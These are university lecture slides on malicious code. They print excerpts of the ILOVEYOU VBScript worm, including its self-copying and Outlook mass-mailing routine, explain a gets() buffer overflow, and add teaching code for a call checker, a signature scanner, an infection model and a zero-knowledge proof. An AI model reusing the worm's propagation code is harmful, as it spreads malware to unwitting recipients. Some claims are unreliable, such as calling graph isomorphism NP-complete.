Lecture 16: Malcode David Evans CS551: Security and Privacy

Lecture 16: Malcode
(From http://cnnfn.cnn.com/2000/10/27/technology/microsoft/)
CS551: Security and Privacy
University of Virginia, Computer Science
David Evans
http://www.cs.virginia.edu/~evans
Menu
• Examination of ILoveYou Code
• Malicious Code Taxonomy
• Malcode Defenses Overview
– Virus Scanners
• Trick or Treat Protocols
27 July 2016
University of Virginia CS 551
2
LoveLetter.VBS
• Excerpts on the manifest
• This 328-line program caused ~$10B in damage last Spring
• How much work and smarts was required?
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
...
wscr.RegWrite "...Scripting Host\Settings\Timeout", 0
sub main()
...
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
...
spreadtoemail()
...
end sub

Annotations on the slide:
• Smart people would convey a more interesting message.
• Smart virus writers don't include their contact information.
• Main loop: sub main()
• This was smart – turn off the scripting timeout in the registry. (Dumb for Microsoft.)
spreadtoemail (edited to fit)
sub spreadtoemail()
  for ctrlists=1 to mapi.AddressLists.Count
    set a=mapi.AddressLists(ctrlists)
    x=1
    for ctrentries=1 to a.AddressEntries.Count
      malead=a.AddressEntries(x)
      set male=out.CreateItem(0)
      male.Recipients.Add(malead)
      male.Subject = "ILOVEYOU"
      male.Body = "kindly check the attached LOVELETTER coming from me."
      male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
      male.Send
      x=x+1
    next
  next
end sub

Annotations on the slide:
• Smart virus writers can spell "mail".
• Smart virus writers understand for loops.
Be Very Afraid...
• When really dumb people with no resources write malicious programs, it costs $10B.
• What would happen if smart people with resources wrote a malicious program?
• See manifest links:
– Two interesting scenarios answering this
– James Gleick article
Attacking Malicious Code
• "Malicious Code" is a bad name
– Code has no intent
– Programmer's intent doesn't matter; what the code does matters
• As networks get more programmable, accidentally harmful code will become common
• We'll use "malcode" (mal = bad)
– It's not a great name either...
Taxonomy of Code
All Code
– Harmless Code (occasionally programs are actually useful, too)
– Malcode
• Created by Malicious Author
• Accidental
Taxonomy of Malcode
[Stallings, p. 502]
Malcode
– Requires Host Program: Trap Doors, Logic Bombs, Trojan Horses, Viruses
– Independent: Insiders, Worms
– Self-Replicating: Viruses, Worms
Worms and Viruses
• People get into stupid arguments over whether something is a "worm" or a "virus"
– Is the Internet a host program?
• See Mark W. Eichin and Jon A. Rochlis, With Microscope and Tweezers: An Analysis of the Internet Virus of November 1988
• Is Outlook a host program for an email?
• Similarly, for worms/viruses/Trojans
– If the user must open it (e.g., ILoveYou), is it self-replicating?
Trojan Horses
• Greeks and Trojans at war
– Eris (Discord), Paris, Aphrodite, Helen
• Greeks attacking Troy bombarded the city for 10 years, but couldn't get through the city walls.
• Pretended to leave, left a big wooden horse as a gift
• Trojans brought the horse into the city (had to tear down part of the wall to do this), got silly drunk celebrating victory.
• Greeks jumped out, killed the sentries, and let in the Greek army.
Modern Trojan Horses
• User runs program that looks harmless
– Program pretends to be "cool, dancing bears", also erases your hard drive
• Most attacks today are Trojan Horses
– ILoveYou, Melissa, recent Microsoft attack, etc.
• Rely on modern humans being as dumb as mythical Trojans
– No matter how good your city/fire walls are, they don't do any good if you can't stop users from running random code
Differences between Morris Worm 1988 and Melissa/ILoveYou 1999
Vulnerabilities Exploited
• Morris Worm:
– Buffer overflow: fingerd uses gets
– sendmail debug mode
– Weak Unix passwords
• Melissa:
– Word enables macros by default, no limitations on macro behavior
• ILoveYou:
– Dumb people will run code attached to email
Buffer Overflows
  int i;
  int k;
  char s[64];
  ...
  gets (s);
Stack diagram (labels from the slide): int i; int k; char s[64]; ...; Frame Pointer; Return Address
Input more than 64 bits: gets just writes down the stack
• bit 65: address of bit 66 on stack
• bits 66-...: instructions
Preventing Buffer Overflows
• Use run-time checks on all memory references
– Safe languages (CLU, Java, Eiffel, etc.)
– Safe libraries for C (don't use gets, strcpy, etc.)
• Separate code and data segments
– Make code segment unwriteable (once application loaded), only allow jumps in code segment
• Static analysis
– Check binary or source code
• But – about ½ of recent vulnerabilities are still buffer overflows!
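The "static analysis" and "safe libraries" bullets above are easy to demonstrate together: a small source-level check that flags calls to the unbounded C library functions (gets, strcpy, strcat, sprintf) and suggests the bounded replacement. This is an added example written for these notes, not code from the lecture; the C snippet it scans is constructed to look like the fingerd pattern described on the previous slide, and the suggestion table is this example's own choice.

```python
import re

# C library calls with an unbounded destination buffer, paired with the
# bounded replacement a reviewer would ask for (this example's own table).
UNSAFE_CALLS = {
    "gets": "fgets(buf, sizeof buf, stdin)",
    "strcpy": "strncpy/strlcpy with an explicit size",
    "strcat": "strncat/strlcat with an explicit size",
    "sprintf": "snprintf with an explicit size",
}

# An unsafe name followed by '(' that is not the tail of a longer identifier
# (so fgets( does not match gets().
CALL_RE = re.compile(r"(?<![A-Za-z0-9_])(" + "|".join(UNSAFE_CALLS) + r")\s*\(")


def strip_strings_and_comments(line):
    """Blank string literals and remove comments so text inside them is not flagged.

    Simplification: handles single-line /* */ and // comments only."""
    line = re.sub(r'"(\\.|[^"\\])*"', '""', line)
    line = re.sub(r"/\*.*?\*/", "", line)
    return line.split("//", 1)[0]


def find_unsafe_calls(source):
    """Return (line_number, function_name, suggestion) for each unsafe call in C source."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for match in CALL_RE.finditer(strip_strings_and_comments(line)):
            name = match.group(1)
            findings.append((lineno, name, UNSAFE_CALLS[name]))
    return findings


# Constructed sample: the fixed-size buffer plus gets() pattern from the lecture.
SAMPLE_C = """\
#include <stdio.h>
#include <string.h>

int lookup(void) {
    char s[64];
    char copy[64];
    gets(s);                     /* unbounded read into a 64-byte buffer */
    strcpy(copy, s);             /* unbounded copy */
    fgets(s, sizeof s, stdin);   // bounded: not flagged
    printf("gets( is only a string here\\n");
    return 0;
}
"""

if __name__ == "__main__":
    for lineno, name, fix in find_unsafe_calls(SAMPLE_C):
        print(f"line {lineno}: call to {name}(); prefer {fix}")
```

Running it reports lines 7 and 8 of the sample and stays quiet on the bounded fgets call and on the string literal, which is the distinction a source checker has to get right to be usable on real code.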
Replication Strategy
• Morris Worm
– Searched .forward files (should have used .rhosts) to find other hosts to attack
– Used password guessing to break into other accounts
– Used fingerd, sendmail vulnerabilities
• Melissa/ILoveYou
– Emails itself to entries in victim's Outlook address book
Damage
• Morris Worm
– Infected ~6000 computers (10% of Internet)
• Melissa
– Infected 1.2 Million machines in a few hours
• ILoveYou
– $10 Billion in damage
Outcomes
• Internet Worm (Robert Morris, Jr.)
– Convicted under ... 1986
– 3 years suspended sentence (no jail time), $10,000 fine.
– Current occupation
• Melissa (David Smith) (~$80m damages)
– Pleaded guilty, Dec 1999 (second successful prosecution of virus author), link to plea agreement on manifest
– Hired by Rutgers as Computer Technician while awaiting sentencing
• ILoveYou ($10B damages)
– Released without penalty, no laws in Philippines
Responses
• Morris Worm
– Disconnect from network
– Disorganized, phone
• Anonymous message (probably from Robert Morris) explaining how to disable virus was not noticed or distributed
– DARPA established CERT
• Melissa
– CERT Advisory, Eradicated quickly
• But CERT had to rebuild Web server
• ILoveYou
– Many countries have since passed laws, Europe treaty announced last week
Malcode Defenses
1. Prevent malcode from running
2. Limit damage it can do
3. Discourage attackers
Malcode Defenses
1. Prevent malcode from running (Today, 20 Nov)
• Virus scanners – recognize known malcode
• Firewalls – strip malcode from incoming packets
• Education – make users smarter
2. Limit damage it can do (Weds.)
• Sandbox ("Playpen") – run malcode in protected virtual machine
• Reference monitors – enforce policy on execution
• System maintenance
3. Discourage attackers (Not in CS551)
• Legal – pass laws to penalize attackers
• Education
Virus Scanners
• Compare code to a database of known malicious code
– Smart authors create self-mutating viruses
• Reasonably useful in days of "sneaker" net (viruses spread on floppies)
• Reasonably useless when viruses spread as fast as email
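To make the first two bullets concrete, here is a toy scanner of the kind the slide describes: it holds a database of known-bad file hashes and known-bad byte fragments and reports which entries match a file. This is an added example for these notes, not code from the lecture or from any scanner product. The sample "files" are constructed from a few lines modelled on the spreadtoemail excerpt above (they are not a working script), and the signature names and pattern are this example's own.

```python
import hashlib


def sha256_hex(data):
    """Whole-file fingerprint used by the exact-match part of the database."""
    return hashlib.sha256(data).hexdigest()


def scan(data, hash_db, pattern_db):
    """Return the sorted names of every signature that matches the file bytes `data`.

    hash_db maps a SHA-256 hex digest of a whole file to a signature name;
    pattern_db maps a signature name to a byte string that must occur in the file.
    """
    hits = set()
    exact = hash_db.get(sha256_hex(data))
    if exact:
        hits.add(exact)
    for name, pattern in pattern_db.items():
        if pattern in data:
            hits.add(name)
    return sorted(hits)


# Constructed sample files (fragments modelled on the slide's excerpt; not runnable code).
ORIGINAL = (b'set male=out.CreateItem(0)\r\n'
            b'male.Attachments.Add(dirsystem&"\\LOVE-LETTER-FOR-YOU.TXT.vbs")\r\n'
            b'male.Send\r\n')
WITH_EXTRA_LINE = b"rem an extra line added in a later copy\r\n" + ORIGINAL
RENAMED = ORIGINAL.replace(b"male", b"msg")

# Constructed signature database: one whole-file hash and one code-fragment pattern.
HASH_DB = {sha256_hex(ORIGINAL): "Example.LoveLetter.exact"}
PATTERN_DB = {"Example.LoveLetter.fragment": b"male.Attachments.Add("}

if __name__ == "__main__":
    samples = [("original", ORIGINAL), ("extra line", WITH_EXTRA_LINE), ("renamed", RENAMED)]
    for label, sample in samples:
        print(f"{label:>10}: {scan(sample, HASH_DB, PATTERN_DB) or 'no match'}")
```

The three samples show the scanner's reach: the whole-file hash matches only the byte-identical copy, the fragment pattern survives an inserted line, and a copy whose variable names differ matches neither entry until someone adds a new signature. That lag between a variant appearing and its signature shipping is what the "self-mutating" bullet and the email-speed bullet are about.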
Virus Spreading
• Read email every hour
• Everyone's address book contains 50 people
• Infects 300M people in 6 hours!
[Chart: number of people infected (0 to 350,000,000) against hour (1 to 6)]
(For more complex model, see Wang/Knight/Elder paper on manifest.)
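The chart on this slide follows from the two bullets with a little arithmetic. The functions below are an added example, not the lecture's own model or the Wang/Knight/Elder model: they assume that at hour 1 only the first victim is infected, that every later hour each person infected during the previous hour mails all 50 address-book entries, and that recipients read mail within the hour. The second function relaxes one assumption (recipients are drawn at random from the population, so some mail lands on people already infected) to show how much the simple count overstates the late hours.

```python
def spread(hours, fanout=50, population=300_000_000):
    """Cumulative number of infected people at the end of each hour.

    Assumed model (this example's simplification): at hour 1 only the initial
    victim is infected; in every later hour each person infected during the
    previous hour mails `fanout` address-book entries, all of whom read mail
    that hour and become infected. The total is capped at the population.
    """
    totals, newly, total = [], 1, 1
    for hour in range(1, hours + 1):
        if hour > 1:
            newly *= fanout
            total = min(population, total + newly)
        totals.append(total)
    return totals


def spread_with_overlap(hours, fanout=50, population=300_000_000):
    """Same model, except each recipient is drawn uniformly at random from the
    whole population, so mail sent to already-infected people is wasted.
    Expected new infections per hour:
        susceptible * P(a given susceptible person receives at least one mail)
    """
    totals, newly, total = [], 1.0, 1.0
    for hour in range(1, hours + 1):
        if hour > 1:
            mails = fanout * newly
            susceptible = population - total
            p_reached = 1.0 - (1.0 - 1.0 / population) ** mails
            newly = susceptible * p_reached
            total = min(float(population), total + newly)
        totals.append(int(round(total)))
    return totals


def hours_to_saturate(fanout, population=300_000_000):
    """First hour at which the simple model has infected the whole population."""
    hour, newly, total = 1, 1, 1
    while total < population:
        hour += 1
        newly *= fanout
        total += newly
    return hour


if __name__ == "__main__":
    naive, overlap = spread(6), spread_with_overlap(6)
    print("hour  simple-model  random-recipients")
    for h, (a, b) in enumerate(zip(naive, overlap), start=1):
        print(f"{h:>4}  {a:>12,}  {b:>17,}")
    print("hours to infect everyone (simple model):", hours_to_saturate(50))
```

With fanout 50 the simple model reaches the population cap at hour 6, matching the slide; the same function with fanout 10 still needs only 10 hours, which is the point of the slide: the time to saturation grows only logarithmically in the population, so a scanner update cycle measured in hours or days cannot keep up.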
How vulnerable are you?
http://security1.norton.com/us/intro.asp
Scans your computer to see if you have purchased enough Symantec software. Tells you in bright red letters you should buy some.
What it Should Do
• Tell people who run their scanner (which accesses every byte on their disk) without checking its certificate that they are very vulnerable and should get an education!
Malcode Summary
• Best defense is education
• Next best defense is a good offence
– Tough legal penalties for convicted attackers
– Doesn't work against motivated foreign governments
• Technical defenses next time
– But much less effective than these
Trick or Treat Protocols
Trick or Treat Protocols
• All legitimate trick-or-treaters have a magic word that identifies them
• Need to prove you know something without revealing it (otherwise you don't need to give the treat)!
• Technical literature calls them "Zero-Knowledge Proofs"
Cave Protocol
• Victor stands at 1
• Peggy enters cave and walks to either 3 or 4
• Victor moves to 2
• Victor yells to Peggy to come out either left or right
• Repeat n times
Diagram: points 1, 2, 3 and 4 in the cave, with the magic word door between 3 and 4. Peggy must know the magic word to open the door.
Quisquater and Guillou, CRYPTO '89
Can Victor convince Colleen that Peggy knows the magic word?
If there’s no cave handy...
1. Peggy uses her secret and a random number to transform the original problem into an isomorphic hard problem.
2. Peggy commits the solution (using a hash function).
3. Peggy reveals the new problem.
4. Victor asks Peggy to either:
a) Prove the new problem is isomorphic to the old one
b) Show the solution to the new problem
5. Repeat n times.
Making an isomorphic hard problem
• Requirements:
– Can't use solution to new problem to solve old problem (without knowing mapping)
– Can't easily solve new problem
– Can show that old problem and new problem are equivalent
• Hmmm...any theory experts?
Graph Isomorphism
• Given two graphs, G1 = <V1, E1> and G2 = <V2, E2>, is there a mapping between V1 and V2 such that G1 and G2 are identical?
• This is an NP-complete problem:
– It's hard to find the mapping.
– Given the mapping, it is easy to check that it is correct.
Using Graph Isomorphism
• Peggy constructs a graph to represent the magic word:
– Vertices are letters
– Chooses edges as necessary
– Hamiltonian cycle is the magic word (a path that goes through each vertex exactly once)
– Finding a Hamiltonian cycle is NP-complete
Trick or Treat
• Peggy shows Victor G, but not the cycle
• Peggy creates H isomorphic to G
– Since she creates it, it is easy to find the Hamiltonian cycle and the isomorphism
• Victor asks for either:
– Map showing G and H are isomorphic
– Hamiltonian cycle for H
• Repeat n times (different H each time)
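The four slides from "If there's no cave handy..." to this one describe one protocol, and it is short enough to run end to end. The code below is an added example for these notes (not the lecture's code): vertices are integers rather than letters, the commitment is SHA-256 over a random 16-byte nonce and the value, and, as in the standard construction, Peggy commits to every vertex pair of H (edge or non-edge) so that she can later open just the cycle's pairs without revealing the rest of H. Victor's challenge is drawn at random unless a fixed list is supplied, which the stand-alone run uses to show that a Peggy who does not know a cycle of G still passes the isomorphism challenge but fails the cycle challenge.

```python
import hashlib
import secrets

# A graph is a frozenset of undirected edges (u, v) with u < v over vertices 0..n-1.


def make_graph(cycle, extra_edges=()):
    """Graph containing the Hamiltonian cycle `cycle` plus decoy edges."""
    n = len(cycle)
    pairs = [(cycle[i], cycle[(i + 1) % n]) for i in range(n)] + list(extra_edges)
    return frozenset((min(u, v), max(u, v)) for u, v in pairs)


def permute_graph(graph, perm):
    """Relabel every vertex v as perm[v]; the result is isomorphic to `graph`."""
    return frozenset((min(perm[u], perm[v]), max(perm[u], perm[v])) for u, v in graph)


def commit(value):
    """SHA-256 commitment with a fresh 16-byte nonce; returns (digest, nonce)."""
    nonce = secrets.token_bytes(16)
    return hashlib.sha256(nonce + value.encode()).hexdigest(), nonce


def opens_to(digest, nonce, value):
    return hashlib.sha256(nonce + value.encode()).hexdigest() == digest


class Peggy:
    """Prover: knows a Hamiltonian cycle of G and proves it without revealing it."""

    def __init__(self, cycle, graph):
        self.n, self.cycle, self.graph = len(cycle), cycle, graph

    def round_commit(self):
        # Slide steps 1-3: fresh random relabelling H = perm(G), then commit to every
        # vertex pair of H ("1" = edge, "0" = non-edge) and hand Victor the commitments.
        self.perm = list(range(self.n))
        secrets.SystemRandom().shuffle(self.perm)
        h = permute_graph(self.graph, self.perm)
        self.openings, commitments = {}, {}
        for u in range(self.n):
            for v in range(u + 1, self.n):
                value = "1" if (u, v) in h else "0"
                commitments[(u, v)], nonce = commit(value)
                self.openings[(u, v)] = (nonce, value)
        return commitments

    def respond(self, challenge):
        if challenge == "isomorphism":            # step 4a: open everything, reveal perm
            return {"perm": self.perm, "openings": self.openings}
        cycle_openings = {}                        # step 4b: open only the cycle's edges in H
        for i in range(self.n):
            u, v = self.perm[self.cycle[i]], self.perm[self.cycle[(i + 1) % self.n]]
            key = (min(u, v), max(u, v))
            cycle_openings[key] = self.openings[key]
        return {"openings": cycle_openings}


def victor_verify(graph, n, commitments, challenge, response):
    """Verifier: every opening must match its commitment and answer the challenge."""
    openings = response["openings"]
    if any(k not in commitments or not opens_to(commitments[k], nonce, val)
           for k, (nonce, val) in openings.items()):
        return False
    if challenge == "isomorphism":
        perm = response["perm"]
        if sorted(perm) != list(range(n)) or len(openings) != n * (n - 1) // 2:
            return False
        h = frozenset(k for k, (_, val) in openings.items() if val == "1")
        return h == permute_graph(graph, perm)
    # "cycle": exactly n opened pairs, all edges, every vertex of degree 2, all connected
    if len(openings) != n or any(val != "1" for _, val in openings.values()):
        return False
    adj = {v: [] for v in range(n)}
    for u, v in openings:
        adj[u].append(v)
        adj[v].append(u)
    if any(len(nbrs) != 2 for nbrs in adj.values()):
        return False
    seen, stack = set(), [0]
    while stack:
        x = stack.pop()
        if x not in seen:
            seen.add(x)
            stack.extend(adj[x])
    return len(seen) == n


def run_protocol(peggy, graph, rounds=20, challenges=None):
    """Repeat commit/challenge/response; a cheater survives each round with probability 1/2."""
    rng = secrets.SystemRandom()
    for i in range(rounds):
        commitments = peggy.round_commit()
        challenge = challenges[i] if challenges else rng.choice(["isomorphism", "cycle"])
        if not victor_verify(graph, peggy.n, commitments, challenge, peggy.respond(challenge)):
            return False
    return True


if __name__ == "__main__":
    cycle = [0, 1, 2, 3, 4, 5]                         # constructed "magic word" cycle
    g = make_graph(cycle, extra_edges=[(0, 3), (1, 4)])
    print("honest Peggy accepted:", run_protocol(Peggy(cycle, g), g))
    cheater = Peggy([0, 2, 1, 3, 4, 5], g)             # claims a cycle that is not in g
    print("cheater, isomorphism challenge:", run_protocol(cheater, g, 1, ["isomorphism"]))
    print("cheater, cycle challenge:", run_protocol(cheater, g, 1, ["cycle"]))
```

Each round gives Victor one of two checks and never both on the same H, which is why he learns nothing about the cycle in G: the isomorphism answer shows H without its cycle, and the cycle answer shows a cycle in a graph whose relation to G stays hidden. After 20 random rounds a cheater's chance of surviving is 2^-20, which is the "repeat n times" on the slide.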
Charge
• Keep cracking on your projects!
• Go forth and educate!
• Ask your trick-or-treaters for Hamiltonian cycles and graph isomorphisms (and keep the candy for yourself)
• Next time: Malicious code defenses